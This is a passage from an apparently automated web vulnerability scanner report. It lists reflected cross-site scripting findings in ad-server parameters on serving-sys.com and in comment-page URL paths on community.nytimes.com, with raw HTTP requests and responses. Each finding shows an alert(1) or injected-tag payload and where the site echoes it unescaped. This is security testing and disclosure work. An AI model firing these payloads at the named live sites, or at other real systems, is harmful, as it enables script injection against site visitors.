Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 1939

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
</IMG>");var ebO = new Object();ebO.w=300;ebO.h=250550d0;alert(1)//2f013fc219c;ebO.pli=1922996;ebO.ai=4005086;ebO.ci=123305;ebO.pi=0;ebO.d=0;ebO.sms="ds.serving-sys.com/BurstingScript/";ebO.bs="bs.serving-sys.com";ebO.p="";ebO.tn="ExpBanner";ebO.hl=30;ebO.au="Site-2452/Type-11/4
...[SNIP]...

3.67. http://bs.serving-sys.com/BurstingPipe/adServer.bs [w parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the w request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 416d8%3balert(1)//ad7018bc358 was submitted in the w parameter. This input was echoed as 416d8;alert(1)//ad7018bc358 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300416d8%3balert(1)//ad7018bc358&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 1939

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
</IMG>");var ebO = new Object();ebO.w=300416d8;alert(1)//ad7018bc358;ebO.h=250;ebO.pli=1922996;ebO.ai=4005086;ebO.ci=123305;ebO.pi=0;ebO.d=0;ebO.sms="ds.serving-sys.com/BurstingScript/";ebO.bs="bs.serving-sys.com";ebO.p="";ebO.tn="ExpBanner";ebO.hl=30;ebO.au="Site-2452
...[SNIP]...

3.68. http://bs.serving-sys.com/BurstingPipe/adServer.bs [z parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the z request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de13f%3balert(1)//59f87800f7c was submitted in the z parameter. This input was echoed as de13f;alert(1)//59f87800f7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0de13f%3balert(1)//59f87800f7c HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bs.serving-sys.com
Proxy-Connection: Keep-Alive
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 1939

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
bO.plt=9;ebO.ut=gEbUT;ebO.oo=0;ebO.op=escape(ebTokens("ebLoadScript(\"ebPlayScript\",\"http://amch.questionmarket.com/adscgen/sta.php?survey_num=787369&site=1922996&code=4005086&ut_sys=eb\")"));ebO.z=0de13f;alert(1)//59f87800f7c;ebO.pv="_3_0_3";ebBv="_4_1_7";ebO.rpv="_2_5_1";ebO.wv="_3_0_1";var ebIfrm=(""=="1");var ebSrc=ebBigS+"eb"+ebO.tn+""+ebBv+".js";document.write("<scr"+"ipt src="+ebSrc+">
...[SNIP]...

3.69. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeab0"><a>aee81adada6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentsaeab0"><a>aee81adada6/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 72749

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Anatomy
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsaeab0"><a>aee81adada6/artsbeat.blogs.nytimes.com/yr/mo/day/anatomy-of-a-scene-unstoppable/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5
...[SNIP]...

3.70. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb87'-alert(1)-'a3eb2ede684 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments9eb87'-alert(1)-'a3eb2ede684/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 72823

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Anatomy
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments9eb87'-alert(1)-'a3eb2ede684';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.71. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d46b"><a>ee5c926c967 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com2d46b"><a>ee5c926c967/2010/11/11/anatomy-of-a-scene-unstoppable/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 33486

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Anatomy
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com2d46b"><a>ee5c926c967/yr/mo/day/anatomy-of-a-scene-unstoppable/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Bottom9,In
...[SNIP]...

3.72. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7aadc"-alert(1)-"9102bf926e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/?7aadc"-alert(1)-"9102bf926e9=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71893

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Anatomy
...[SNIP]...
ount = "nytimesglobal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142717";
var s_pagename = "2010/11/11/anatomy-of-a-scene-unstoppable/?7aadc"-alert(1)-"9102bf926e9=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.73. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc14d"><a>43c86213e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentsfc14d"><a>43c86213e2/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 79273

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ancient
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsfc14d"><a>43c86213e2/artsbeat.blogs.nytimes.com/yr/mo/day/ancient-roman-shrine-restored-reopens-to-public/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpro
...[SNIP]...

3.74. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7731'-alert(1)-'1133d4592f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /commentsb7731'-alert(1)-'1133d4592f0/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 79339

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ancient
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'commentsb7731'-alert(1)-'1133d4592f0';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.75. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 805f0"><a>e8419ae2ec2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com805f0"><a>e8419ae2ec2/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34100

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ancient
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com805f0"><a>e8419ae2ec2/yr/mo/day/ancient-roman-shrine-restored-reopens-to-public/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,B
...[SNIP]...

3.76. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bd7f"-alert(1)-"eca8685c5da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/?2bd7f"-alert(1)-"eca8685c5da=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 77290

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ancient
...[SNIP]...
obal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142683";
var s_pagename = "2010/11/11/ancient-roman-shrine-restored-reopens-to-public/?2bd7f"-alert(1)-"eca8685c5da=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.77. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1180"><a>b75e6cb0360 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentsb1180"><a>b75e6cb0360/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71433

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Grants
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsb1180"><a>b75e6cb0360/artsbeat.blogs.nytimes.com/yr/mo/day/grants-awarded-for-preservation-of-new-york-sites/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetp
...[SNIP]...

3.78. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efe6c'-alert(1)-'1c749a99567 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /commentsefe6c'-alert(1)-'1c749a99567/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71521

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Grants
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
